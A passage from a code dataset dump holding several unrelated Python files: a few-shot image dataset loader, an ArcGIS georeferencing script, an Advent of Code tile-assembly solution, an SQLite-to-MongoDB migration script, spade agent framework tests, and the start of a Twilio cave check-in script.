os.path.join(self.meta['image_names'][choose])\n auxiliary_image = Image.open(auxiliary_image_path).convert('RGB')\n auxiliary_image = self.transform(auxiliary_image)\n else: # use an image in same class\n labels = self.meta['image_labels']\n same_cls_idxs = np.where(labels == target)[0]\n choose = np.random.choice(same_cls_idxs, 1)[0]\n auxiliary_image_path = os.path.join(self.meta['image_names'][choose])\n auxiliary_image = Image.open(auxiliary_image_path).convert('RGB')\n auxiliary_image = self.transform(auxiliary_image)\n\n for l in range(replace_block_num):\n replaced_index = replaced_indexs[l]\n img[0:3, patch_xl[replaced_index]:patch_xr[replaced_index], patch_yl[replaced_index]:patch_yr[replaced_index]] = auxiliary_image[0:3,\n patch_xl[replaced_index]:patch_xr[replaced_index],\n patch_yl[replaced_index]:patch_yr[replaced_index]]\n\n return img, target\n\n def __len__(self):\n return len(self.meta['image_names'])\n\n\nclass SetDataset:\n def __init__(self, data_file, batch_size, transform):\n with open(data_file, 'r') as f:\n self.meta = json.load(f)\n \n self.cl_list = np.unique(self.meta['image_labels']).tolist()\n\n self.sub_meta = {}\n for cl in self.cl_list:\n self.sub_meta[cl] = []\n\n for x,y in zip(self.meta['image_names'],self.meta['image_labels']):\n self.sub_meta[y].append(x)\n\n self.sub_dataloader = [] \n sub_data_loader_params = dict(batch_size = batch_size,\n shuffle = True,\n num_workers = 0, #use main thread only or may receive multiple batches\n pin_memory = False) \n for cl in self.cl_list:\n sub_dataset = SubDataset(self.sub_meta[cl], cl, transform = transform )\n self.sub_dataloader.append(torch.utils.data.DataLoader(sub_dataset, **sub_data_loader_params) )\n\n def __getitem__(self,i):\n return next(iter(self.sub_dataloader[i]))\n\n def __len__(self):\n return len(self.cl_list)\n\nclass SubDataset:\n def __init__(self, sub_meta, cl, transform=transforms.ToTensor(), target_transform=identity):\n self.sub_meta = sub_meta\n self.cl = cl \n self.transform = transform\n self.target_transform = target_transform\n\n def __getitem__(self,i):\n #print( '%d -%d' %(self.cl,i))\n image_path = os.path.join( self.sub_meta[i])\n img = Image.open(image_path).convert('RGB')\n img = self.transform(img)\n target = self.target_transform(self.cl)\n return img, target\n\n def __len__(self):\n return len(self.sub_meta)\n\nclass EpisodicBatchSampler(object):\n def __init__(self, n_classes, n_way, n_episodes, shuffle=True):\n self.n_classes = n_classes\n self.n_way = n_way\n self.n_episodes = n_episodes\n self.shuffle = shuffle\n\n def __len__(self):\n return self.n_episodes\n\n def __iter__(self):\n for i in range(self.n_episodes):\n if self.shuffle:\n extracted_cls = torch.randperm(self.n_classes)[:self.n_way]\n else:\n extracted_cls = [x for x in range(self.n_classes)][:self.n_way]\n yield extracted_cls\n\n\n\n\n", "sub_path": "data/dataset.py", "file_name": "dataset.py", "file_ext": "py", "file_size_in_byte": 6143, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.array", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 14, "usage_type": "call"}, {"api_name": "json.load", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 27, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 27, "usage_type": "name"}, {"api_name": "json.load", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path", "line_number": 57, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 58, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 58, "usage_type": "name"}, {"api_name": "numpy.random.randint", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 68, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 69, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 71, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 74, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 75, "usage_type": "call"}, {"api_name": "os.path", "line_number": 75, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 76, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 76, "usage_type": "name"}, {"api_name": "numpy.where", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 81, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path", "line_number": 82, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 83, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 83, "usage_type": "name"}, {"api_name": "json.load", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 119, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 119, "usage_type": "attribute"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 128, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 128, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 136, "usage_type": "call"}, {"api_name": "os.path", "line_number": 136, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 137, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 137, "usage_type": "name"}, {"api_name": "torch.randperm", "line_number": 158, "usage_type": "call"}]} +{"seq_id": "470879613", "text": "# -*- coding: cp1254 -*-\n# -*- ##################\n# ---------------------------------------------------------------------------\n# create_semih_archydro.py\n#\n# Coded by :\n# Semih DALGIN\n# semihdalgin@gmail.com\n#\n#\n# ---------------------------------------------------------------------------\n# Import system modules\nimport arcpy, time, datetime, os, sys, string, csv, shutil, fileinput, string\nimport arcgisscripting\nmxd = arcpy.mapping.MapDocument(\"CURRENT\")\ndf = arcpy.mapping.ListDataFrames(mxd,\"Layers\")[0]\narcpy.env.overwriteOutput=True\n\n\ntry:\n # Script arguments\n arcpy.AddMessage (\"\\nDr.Semih DALGIN tarafından yapıldı.\")\n arcpy.AddMessage (\"\\nİletişim adresi: semihdalgin@gmail.com\")\n arcpy.AddMessage (\"\\nBaşlangıç Değerleri Alınıyor...\" )\n\n try:\n # Make parameters array, and later write input parameter values to an output file\n parameters = []\n now = datetime.datetime.now()\n parameters.append(\"Date and Time: \"+ now.strftime(\"%Y-%m-%d %H:%M\"))\n # Folder where output files will be saved\n workspace1 = arcpy.GetParameterAsText(0)\n # Donusum Dosyasi\n don = arcpy.GetParameterAsText(1)\n # DRE\n #dre = arcpy.GetParameterAsText(2)\n # Projeksiyon\n prj = arcpy.GetParameterAsText(2)\n \n except:\n arcpy.AddMessage(\"\\nError in input arguments: \" + arcpy.GetMessages(2))\n raise Exception\n # Check and create output folders\n try:\n arcpy.AddMessage(\"\\nCreating output folders...\")\n thefolders=[\"DRE\",\"ULKE\"]\n for folder in thefolders:\n if not arcpy.Exists(workspace1 + folder):\n arcpy.CreateFolder_management(workspace1, folder)\n except:\n arcpy.AddError(\"\\nError creating output folders: \" + arcpy.GetMessages(2))\n raise Exception\n # Calculations\n try:\n arcpy.env.workspace=workspace1\n rstname = arcpy.ListDatasets()\n cc=0\n \n for fc in rstname:\n cc=cc+1\n for xox in range (0,cc,1):\n rssa=rstname[xox].split(os.extsep)[0]\n exportname=workspace1+\"\\\\DRE\\\\\"+rssa+\".tif\"\n exportname1=workspace1+\"\\\\ULKE\\\\\"+rssa+\".tif\"\n arcpy.AddMessage(\"\\nÇalışılan Dosya \" + str(rssa)+\" \"+str(xox+1))\n dreal=workspace1+\"\\\\\"+rssa+\".dre\"\n dreadi=workspace1+\"\\\\DRE\\\\\"+rssa+\".txt\"\n \n dosyadre = open(dreal) \n asd = dosyadre.read() \n dosya1 = open(dreadi, 'a+') \n\n with open(dreal) as openfile:\n for line in openfile:\n for part in line.split():\n if \"RasterPY1=\" in part:\n a1= part.split('=')[1]\n if \"RasterPX1=\" in part:\n a2= part.split('=')[1]\n if \"HaritaPY1=\" in part:\n a3= part.split('=')[1]\n if \"HaritaPX1=\" in part:\n a4= part.split('=')[1]\n if \"RasterPY2=\" in part:\n a5= part.split('=')[1]\n if \"RasterPX2=\" in part:\n a6= part.split('=')[1]\n if \"HaritaPY2=\" in part:\n a7= part.split('=')[1]\n if \"HaritaPX2=\" in part:\n a8= part.split('=')[1]\n if \"RasterPY3=\" in part:\n a9= part.split('=')[1]\n if \"RasterPX3=\" in part:\n a10= part.split('=')[1]\n if \"HaritaPY3=\" in part:\n a11= part.split('=')[1]\n if \"HaritaPX3=\" in part:\n a12= part.split('=')[1]\n if \"RasterPY4=\" in part:\n a13= part.split('=')[1]\n if \"RasterPX4=\" in part:\n a14= part.split('=')[1]\n if \"HaritaPY4=\" in part:\n a15= part.split('=')[1]\n if \"HaritaPX4=\" in part:\n a16= part.split('=')[1]\n \n dosya1.write(a1+\",\"+a2+\",\"+a3+\",\"+a4+\"\\n\"+a5+\",\"+a6+\",\"+a7+\",\"+a8+\"\\n\"+a9+\",\"+a10+\",\"+a11+\",\"+a12+\"\\n\"+a13+\",\"+a14+\",\"+a15+\",\"+a16+\"\\n\") \n dosya1.close()\n \n if not arcpy.Exists(exportname):\n dosya=workspace1+\"\\\\\"+rstname[xox]\n arcpy.AddMessage(\"\\nÇalışılan Dosya \" + str(dosya))\n arcpy.WarpFromFile_management(dosya,exportname,dreadi,\"POLYORDER1\",\"NEAREST\")\n arcpy.DefineProjection_management(exportname,prj)\n if not arcpy.Exists(exportname1):\n dosya1=workspace1+\"\\\\DRE\\\\\"+rstname[xox]\n arcpy.AddMessage(\"\\nÇalışılan Dosya \" + str(dosya1))\n arcpy.WarpFromFile_management(dosya1,exportname1,don,\"POLYORDER1\",\"NEAREST\")\n arcpy.DefineProjection_management(exportname1,prj) \n except:\n arcpy.AddError(\"\\nHata Hesaplamalarda\" + arcpy.GetMessages(2))\n raise Exception \nexcept:\n arcpy.AddError(\"\\nError running script\")\n raise Exception\n", "sub_path": "L2U_DRE.py", "file_name": "L2U_DRE.py", "file_ext": "py", "file_size_in_byte": 5322, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "arcpy.mapping.MapDocument", "line_number": 15, "usage_type": "call"}, {"api_name": "arcpy.mapping", "line_number": 15, "usage_type": "attribute"}, {"api_name": "arcpy.mapping.ListDataFrames", "line_number": 16, "usage_type": "call"}, {"api_name": "arcpy.mapping", "line_number": 16, "usage_type": "attribute"}, {"api_name": "arcpy.env", "line_number": 17, "usage_type": "attribute"}, {"api_name": "arcpy.AddMessage", "line_number": 22, "usage_type": "call"}, {"api_name": "arcpy.AddMessage", "line_number": 23, "usage_type": "call"}, {"api_name": "arcpy.AddMessage", "line_number": 24, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 29, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 29, "usage_type": "attribute"}, {"api_name": "arcpy.GetParameterAsText", "line_number": 32, "usage_type": "call"}, {"api_name": "arcpy.GetParameterAsText", "line_number": 34, "usage_type": "call"}, {"api_name": "arcpy.GetParameterAsText", "line_number": 38, "usage_type": "call"}, {"api_name": "arcpy.AddMessage", "line_number": 41, "usage_type": "call"}, {"api_name": "arcpy.GetMessages", "line_number": 41, "usage_type": "call"}, {"api_name": "arcpy.AddMessage", "line_number": 45, "usage_type": "call"}, {"api_name": "arcpy.Exists", "line_number": 48, "usage_type": "call"}, {"api_name": "arcpy.CreateFolder_management", "line_number": 49, "usage_type": "call"}, {"api_name": "arcpy.AddError", "line_number": 51, "usage_type": "call"}, {"api_name": "arcpy.GetMessages", "line_number": 51, "usage_type": "call"}, {"api_name": "arcpy.env", "line_number": 55, "usage_type": "attribute"}, {"api_name": "arcpy.ListDatasets", "line_number": 56, "usage_type": "call"}, {"api_name": "os.extsep", "line_number": 62, "usage_type": "attribute"}, {"api_name": "arcpy.AddMessage", "line_number": 65, "usage_type": "call"}, {"api_name": "arcpy.Exists", "line_number": 112, "usage_type": "call"}, {"api_name": "arcpy.AddMessage", "line_number": 114, "usage_type": "call"}, {"api_name": "arcpy.WarpFromFile_management", "line_number": 115, "usage_type": "call"}, {"api_name": "arcpy.DefineProjection_management", "line_number": 116, "usage_type": "call"}, {"api_name": "arcpy.Exists", "line_number": 117, "usage_type": "call"}, {"api_name": "arcpy.AddMessage", "line_number": 119, "usage_type": "call"}, {"api_name": "arcpy.WarpFromFile_management", "line_number": 120, "usage_type": "call"}, {"api_name": "arcpy.DefineProjection_management", "line_number": 121, "usage_type": "call"}, {"api_name": "arcpy.AddError", "line_number": 123, "usage_type": "call"}, {"api_name": "arcpy.GetMessages", "line_number": 123, "usage_type": "call"}, {"api_name": "arcpy.AddError", "line_number": 126, "usage_type": "call"}]} +{"seq_id": "339630696", "text": "def input():\n input_data = list(filter(None, open('day_20/input.txt').read().split('\\n\\n')))\n return list(map(lambda lines: Tile(lines), input_data))\n\nclass Tile:\n def __init__(self, lines):\n lines = lines.split('\\n')\n self.id = int(lines[0].split()[1].strip(':'))\n self.image = [line.strip() for line in lines[1:]]\n self.build_borders()\n\n def build_borders(self):\n lines = self.image\n self.borders = [\n ''.join(lines[0]),\n ''.join([line[-1] for line in lines]),\n ''.join(reversed(lines[-1])),\n ''.join([line[0] for line in reversed(lines)]),\n ]\n self.flipped_borders = [\n ''.join(reversed(lines[0])),\n ''.join([line[-1] for line in reversed(lines)]),\n ''.join(lines[-1]),\n ''.join([line[0] for line in lines]),\n ]\n\n def flip(self):\n self.image = [''.join(reversed(line)) for line in self.image[:]]\n self.build_borders()\n\n def rotate(self):\n size = len(self.image)\n new_image = []\n for x in range(0, size):\n new_image.append([])\n for y in range(0, size):\n new_image[x].append(self.image[size - 1 - y][x])\n self.image = [''.join(line) for line in new_image]\n self.build_borders()\n\n\nfrom collections import defaultdict\n\ndef count_border_ids(tiles):\n border_id_counts = defaultdict(int)\n\n for tile in tiles:\n for border in tile.borders:\n border_id_counts[border] += 1\n for border in tile.flipped_borders:\n border_id_counts[border] += 1\n return border_id_counts\n\ndef count_unique_borders(borders, border_id_counts):\n count = 0\n for border in borders:\n if border_id_counts[border] == 1:\n count += 1\n return count\n\ndef find_corners(tiles, border_id_counts):\n corners = set()\n corners_total = 1\n for tile in tiles:\n if count_unique_borders(tile.borders, border_id_counts) == 2 or count_unique_borders(tile.flipped_borders, border_id_counts) == 2:\n corners.add(tile)\n corners_total *= tile.id\n return corners, corners_total\n\ndef part_1(tiles):\n border_id_counts = count_border_ids(tiles)\n corners, corners_total = find_corners(tiles, border_id_counts)\n return corners_total\n\n\ndef find_matching_tile(tiles, searched, border_index, done):\n for tile in tiles:\n if tile.id in done:\n continue\n if searched in tile.flipped_borders:\n tile.flip()\n if searched not in tile.borders:\n raise Exception('Bad flip.')\n if searched in tile.borders:\n while searched != tile.borders[border_index]:\n tile.rotate()\n done.add(tile.id)\n return tile\n raise Exception('Image tile not found.')\n\ndef find_first_image_column(tiles, image, image_size, done, border_id_counts):\n x = 0\n for y in range(1, image_size):\n searched = image[x][y-1].flipped_borders[2]\n tile = find_matching_tile(tiles, searched, 0, done)\n if border_id_counts[tile.borders[3]] != 1:\n raise Exception('Not a proper border tile: %d.' % border_id_counts[tile.borders[1]])\n image[x].append(tile)\n\ndef find_other_image_columns(tiles, image, image_size, done):\n for x in range(1, image_size):\n image.append([])\n for y in range(0, image_size):\n searched = image[x-1][y].flipped_borders[1]\n tile = find_matching_tile(tiles, searched, 3, done)\n image[x].append(tile)\n\ndef make_full_image_tile(tiles, top_left, border_id_counts):\n while border_id_counts[top_left.borders[0]] != 1 or border_id_counts[top_left.borders[3]] != 1:\n top_left.rotate()\n\n done = set()\n done.add(top_left.id)\n\n image = [[top_left]]\n image_size = 12\n\n find_first_image_column(tiles, image, image_size, done, border_id_counts)\n find_other_image_columns(tiles, image, image_size, done)\n\n lines = ['Tile 0:']\n for y in range(0, image_size):\n for sub_y in range(1, len(image[0][0].image) - 1):\n line_parts = []\n for x in range(0, image_size):\n line_parts.append(image[x][y].image[sub_y][1:-1])\n lines.append(''.join(line_parts))\n return Tile('\\n'.join(lines))\n\ndef count_monster_dots(full_image):\n monster = [\n (18, 0),\n (0, 1), (5, 1), (6, 1), (11, 1), (12, 1), (17, 1), (18, 1), (19, 1), \n (1, 2), (4, 2), (7, 2), (10, 2), (13, 2), (16, 2), \n ]\n\n size = len(full_image.image[0])\n count = 0\n for flip in range(0, 2):\n full_image.flip()\n for rot in range(0, 4):\n full_image.rotate()\n for x in range(0, size):\n for y in range(0, size):\n for delta in monster:\n mx = x+delta[0]\n my = y+delta[1]\n if mx >= size or my >= size:\n break\n if full_image.image[my][mx] != '#':\n break\n else:\n count += 1\n return count * len(monster)\n\ndef count_image_dots(full_image):\n dot_count = 0\n size = len(full_image.image[0])\n for x in range(0, size):\n for y in range(0, size):\n if full_image.image[y][x] == '#':\n dot_count += 1\n return dot_count\n\n\ndef part_2(tiles):\n border_id_counts = count_border_ids(tiles)\n corners, corners_total = find_corners(tiles, border_id_counts)\n full_image = make_full_image_tile(tiles, corners.pop(), border_id_counts)\n return count_image_dots(full_image) - count_monster_dots(full_image)\n\nif __name__ == '__main__':\n print(part_1(input()))\n print(part_2(input()))\n", "sub_path": "day_20/day_20.py", "file_name": "day_20.py", "file_ext": "py", "file_size_in_byte": 5821, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "collections.defaultdict", "line_number": 45, "usage_type": "call"}]} +{"seq_id": "258907782", "text": "import pymongo\nimport os\nfrom dotenv import load_dotenv\nimport sqlite3\nimport pandas as pd\n\nload_dotenv()\n\nDB_URL = os.getenv(\"DB_URL\")\n\nconnection_uri = DB_URL\nclient = pymongo.MongoClient(connection_uri)\n\nsl_conn = sqlite3.connect('rpg_db.sqlite3') # connect to rpg database\nsl_curs = sl_conn.cursor()\n\nqueries = [['charactercreator_character', 'SELECT * FROM charactercreator_character'],\n ['armory_item', 'SELECT * FROM armory_item'], ['armory_weapoon', 'SELECT * FROM armory_weapon'],\n ['charactercreator_character_inventory', 'SELECT * FROM charactercreator_character_inventory'],\n ['charactercreator_cleric', 'SELECT * FROM charactercreator_cleric'],\n ['charactercreator_fighter', 'SELECT * FROM charactercreator_fighter'],\n ['charactercreator_mage', 'SELECT * FROM charactercreator_mage'],\n ['charactercreator_necromancer', 'SELECT * FROM charactercreator_necromancer'],\n ['charactercreator_thief', 'SELECT * FROM charactercreator_thief']]\n\ndb = client.rpgdata\nfor query in queries:\n collection_name = query[0]\n\n get_query = query[1]\n objects = sl_curs.execute(get_query).fetchall()\n\n df = pd.read_sql(get_query, con=sl_conn)\n df = df.to_dict(orient='records')\n\n db[collection_name].insert_many(df)\n\nsl_conn.close()\n\n# I enjoyed working with mongodb much more than postgresql. I found really nothing that was harder and everything\n# was more simple. The more relaxed rules of mongodb make it easier to work with. However, in a real prod environment,\n# I can definitely see some downsides as well as upsides to mongodb.\n", "sub_path": "module3-nosql-and-document-oriented-databases/mongo.py", "file_name": "mongo.py", "file_ext": "py", "file_size_in_byte": 1617, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 7, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 9, "usage_type": "call"}, {"api_name": "pymongo.MongoClient", "line_number": 12, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 14, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 33, "usage_type": "call"}]} +{"seq_id": "301037339", "text": "import asyncio\n\nimport aioxmpp\nfrom aioxmpp import PresenceManagedClient\nfrom asynctest import CoroutineMock, Mock\nfrom testfixtures import LogCapture\n\nfrom spade.agent import Agent\nfrom spade.behaviour import OneShotBehaviour\nfrom spade.message import Message\nfrom spade.template import Template\nfrom .factories import MockedAgentFactory\n\n\ndef test_create_agent(mocker):\n agent = Agent(\"jid@server\", \"fake_password\")\n agent._async_connect = CoroutineMock()\n\n assert agent.is_alive() is False\n\n future = agent.start(auto_register=False)\n assert future.result() is None\n\n agent._async_connect.assert_called_once()\n assert agent.stream is None\n\n agent.conn_coro = mocker.Mock()\n agent.conn_coro.__aexit__ = CoroutineMock()\n\n assert agent.is_alive() is True\n future = agent.stop()\n future.result()\n\n agent.conn_coro.__aexit__.assert_called_once()\n\n assert agent.is_alive() is False\n\n\ndef test_connected_agent():\n agent = MockedAgentFactory()\n assert agent.is_alive() is False\n\n future = agent.start(auto_register=False)\n assert future.result() is None\n assert agent.is_alive() is True\n\n future = agent.stop()\n future.result()\n assert agent.is_alive() is False\n\n\ndef test_name():\n agent = MockedAgentFactory(jid=\"john@fake_server\")\n assert agent.name == \"john\"\n\n\ndef test_avatar():\n agent = MockedAgentFactory(jid=\"test_avatar@fake_server\")\n assert (\n agent.avatar\n == \"http://www.gravatar.com/avatar/44bdc5585ef57844edb11c5b9711d2e6?d=monsterid\"\n )\n\n\ndef test_setup():\n agent = MockedAgentFactory()\n agent.setup = CoroutineMock()\n future = agent.start(auto_register=False)\n assert future.result() is None\n\n agent.setup.assert_called_once()\n agent.stop()\n\n\ndef test_set_get():\n agent = MockedAgentFactory()\n agent.set(\"KB_name\", \"KB_value\")\n assert agent.get(\"KB_name\") == \"KB_value\"\n\n\ndef test_get_none():\n agent = MockedAgentFactory()\n assert agent.get(\"KB_name_unknown\") is None\n\n\ndef test_client():\n agent = MockedAgentFactory()\n assert agent.client is None\n\n future = agent.start()\n future.result()\n assert type(agent.client) == PresenceManagedClient\n\n\ndef test_register():\n agent = MockedAgentFactory()\n agent.register = Mock()\n\n future = agent.start(auto_register=True)\n assert future.result() is None\n\n assert len(agent._async_register.mock_calls) == 1\n\n agent.stop()\n\n\ndef test_receive_without_behaviours():\n agent = MockedAgentFactory()\n aiomsg = aioxmpp.Message(type_=aioxmpp.MessageType.CHAT)\n msg = Message.from_node(aiomsg)\n\n assert agent.traces.len() == 0\n future = agent.start(auto_register=False)\n assert future.result() is None\n\n with LogCapture() as log:\n agent._message_received(aiomsg)\n log.check_present(\n (\"spade.Agent\", \"WARNING\", f\"No behaviour matched for message: {msg}\")\n )\n\n assert agent.traces.len() == 1\n assert msg in agent.traces.store[0]\n\n agent.stop()\n\n\ndef test_create_agent_from_another_agent():\n class DummyBehav(OneShotBehaviour):\n async def run(self):\n self.agent._done = True\n self.kill()\n\n class CreateBehav(OneShotBehaviour):\n async def run(self):\n self.agent.agent2 = MockedAgentFactory()\n self.agent.agent2._done = False\n self.agent.dummy_behav = DummyBehav()\n self.agent.agent2.add_behaviour(self.agent.dummy_behav)\n await self.agent.agent2.start(auto_register=False)\n self.kill()\n\n agent1 = MockedAgentFactory()\n agent1.agent2 = None\n create_behav = CreateBehav()\n agent1.add_behaviour(create_behav)\n future = agent1.start(auto_register=False)\n assert future.result() is None\n assert agent1.is_alive()\n\n create_behav.join()\n agent1.dummy_behav.join()\n\n assert agent1.agent2.is_alive()\n assert agent1.agent2._done\n\n agent1.agent2.stop()\n agent1.stop()\n\n\ndef test_create_agent_from_another_agent_from_setup():\n class DummyBehav(OneShotBehaviour):\n async def run(self):\n self.agent._done = True\n self.kill()\n\n class SetupAgent(Agent):\n async def setup(self):\n self.agent2 = MockedAgentFactory()\n self.agent2._done = False\n self.agent2.dummy_behav = DummyBehav()\n self.agent2.add_behaviour(self.agent2.dummy_behav)\n await self.agent2.start(auto_register=False)\n\n agent1 = SetupAgent(\"fake@host\", \"secret\")\n agent1._async_connect = CoroutineMock()\n agent1._async_register = CoroutineMock()\n agent1.conn_coro = Mock()\n agent1.conn_coro.__aexit__ = CoroutineMock()\n agent1.stream = Mock()\n\n agent1.agent2 = None\n\n future = agent1.start(auto_register=False)\n assert future.result() is None\n assert agent1.is_alive()\n\n agent1.agent2.dummy_behav.join()\n\n assert agent1.agent2.is_alive()\n assert agent1.agent2._done\n\n agent1.agent2.stop()\n agent1.stop()\n\n\ndef test_submit_send():\n agent = MockedAgentFactory()\n\n class DummyBehav(OneShotBehaviour):\n async def run(self):\n self.agent.recv_msg = await self.receive(10)\n\n template = Template(to=\"fake@jid\")\n behav = DummyBehav()\n agent.add_behaviour(behav, template=template)\n\n future = agent.start(auto_register=False)\n future.result()\n\n msg_to_send = Message(to=\"fake@jid\", body=\"BODY\", metadata={\"performative\": \"TEST\"})\n agent.submit(behav.send(msg_to_send))\n behav.join()\n\n assert str(agent.recv_msg.to) == \"fake@jid\"\n assert agent.recv_msg.body == \"BODY\"\n assert agent.recv_msg.metadata == {\"performative\": \"TEST\"}\n\n\ndef test_stop_agent_with_blocking_await():\n agent1 = MockedAgentFactory()\n agent1.value = 1000\n\n class StopBehav(OneShotBehaviour):\n async def run(self):\n await asyncio.sleep(0.5)\n await self.agent.stop()\n\n class DummyBehav(OneShotBehaviour):\n async def run(self):\n await self.receive(timeout=1000000)\n self.agent.value = 2000\n\n stopbehah = StopBehav()\n dummybehav = DummyBehav()\n\n agent1.add_behaviour(dummybehav)\n agent1.add_behaviour(stopbehah)\n\n future1 = agent1.start(auto_register=False)\n future1.result()\n\n stopbehah.join()\n\n assert not agent1.is_alive()\n assert agent1.value == 1000\n", "sub_path": "tests/test_agent.py", "file_name": "test_agent.py", "file_ext": "py", "file_size_in_byte": 6358, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "spade.agent.Agent", "line_number": 16, "usage_type": "call"}, {"api_name": "asynctest.CoroutineMock", "line_number": 17, "usage_type": "call"}, {"api_name": "asynctest.CoroutineMock", "line_number": 28, "usage_type": "call"}, {"api_name": "factories.MockedAgentFactory", "line_number": 40, "usage_type": "call"}, {"api_name": "factories.MockedAgentFactory", "line_number": 53, "usage_type": "call"}, {"api_name": "factories.MockedAgentFactory", "line_number": 58, "usage_type": "call"}, {"api_name": "factories.MockedAgentFactory", "line_number": 66, "usage_type": "call"}, {"api_name": "asynctest.CoroutineMock", "line_number": 67, "usage_type": "call"}, {"api_name": "factories.MockedAgentFactory", "line_number": 76, "usage_type": "call"}, {"api_name": "factories.MockedAgentFactory", "line_number": 82, "usage_type": "call"}, {"api_name": "factories.MockedAgentFactory", "line_number": 87, "usage_type": "call"}, {"api_name": "aioxmpp.PresenceManagedClient", "line_number": 92, "usage_type": "name"}, {"api_name": "factories.MockedAgentFactory", "line_number": 96, "usage_type": "call"}, {"api_name": "asynctest.Mock", "line_number": 97, "usage_type": "call"}, {"api_name": "factories.MockedAgentFactory", "line_number": 108, "usage_type": "call"}, {"api_name": "aioxmpp.Message", "line_number": 109, "usage_type": "call"}, {"api_name": "aioxmpp.MessageType", "line_number": 109, "usage_type": "attribute"}, {"api_name": "spade.message.Message.from_node", "line_number": 110, "usage_type": "call"}, {"api_name": "spade.message.Message", "line_number": 110, "usage_type": "name"}, {"api_name": "testfixtures.LogCapture", "line_number": 116, "usage_type": "call"}, {"api_name": "spade.behaviour.OneShotBehaviour", "line_number": 129, "usage_type": "name"}, {"api_name": "spade.behaviour.OneShotBehaviour", "line_number": 134, "usage_type": "name"}, {"api_name": "factories.MockedAgentFactory", "line_number": 136, "usage_type": "call"}, {"api_name": "factories.MockedAgentFactory", "line_number": 143, "usage_type": "call"}, {"api_name": "spade.behaviour.OneShotBehaviour", "line_number": 162, "usage_type": "name"}, {"api_name": "spade.agent.Agent", "line_number": 167, "usage_type": "name"}, {"api_name": "factories.MockedAgentFactory", "line_number": 169, "usage_type": "call"}, {"api_name": "asynctest.CoroutineMock", "line_number": 176, "usage_type": "call"}, {"api_name": "asynctest.CoroutineMock", "line_number": 177, "usage_type": "call"}, {"api_name": "asynctest.Mock", "line_number": 178, "usage_type": "call"}, {"api_name": "asynctest.CoroutineMock", "line_number": 179, "usage_type": "call"}, {"api_name": "asynctest.Mock", "line_number": 180, "usage_type": "call"}, {"api_name": "factories.MockedAgentFactory", "line_number": 198, "usage_type": "call"}, {"api_name": "spade.behaviour.OneShotBehaviour", "line_number": 200, "usage_type": "name"}, {"api_name": "spade.template.Template", "line_number": 204, "usage_type": "call"}, {"api_name": "spade.message.Message", "line_number": 211, "usage_type": "call"}, {"api_name": "factories.MockedAgentFactory", "line_number": 221, "usage_type": "call"}, {"api_name": "spade.behaviour.OneShotBehaviour", "line_number": 224, "usage_type": "name"}, {"api_name": "asyncio.sleep", "line_number": 226, "usage_type": "call"}, {"api_name": "spade.behaviour.OneShotBehaviour", "line_number": 229, "usage_type": "name"}]} +{"seq_id": "597332872", "text": "import datetime as dt\nimport threading\nimport twilio_functions as tw\n\nCAVEMANAGER = (\"Desolation Wilderness\", \"Ranger Maria\", 7146810524) #to be hard coded into device\n##############################################\n##############################################\n# UPDATE: to be imported somehow from database\n##############################################\n##############################################\ncheck_in = {\"photo\": \"123.jpg\", \"date_time\": dt.datetime(2020,3,7,10,0),\n\"user\": (123456, \"Sonia Meyer\", 7146810524), \"group_size\": 3,\n\"expected_out\": dt.datetime(2020,3,7,18,0), \"call_out\": dt.datetime(2020,3,8,8,0)}\ncheck_out = {\"photo\": \"456.jpg\", \"date_time\": dt.datetime(2020,3,7,18,30),\n\"user\": (123456, \"Sonia 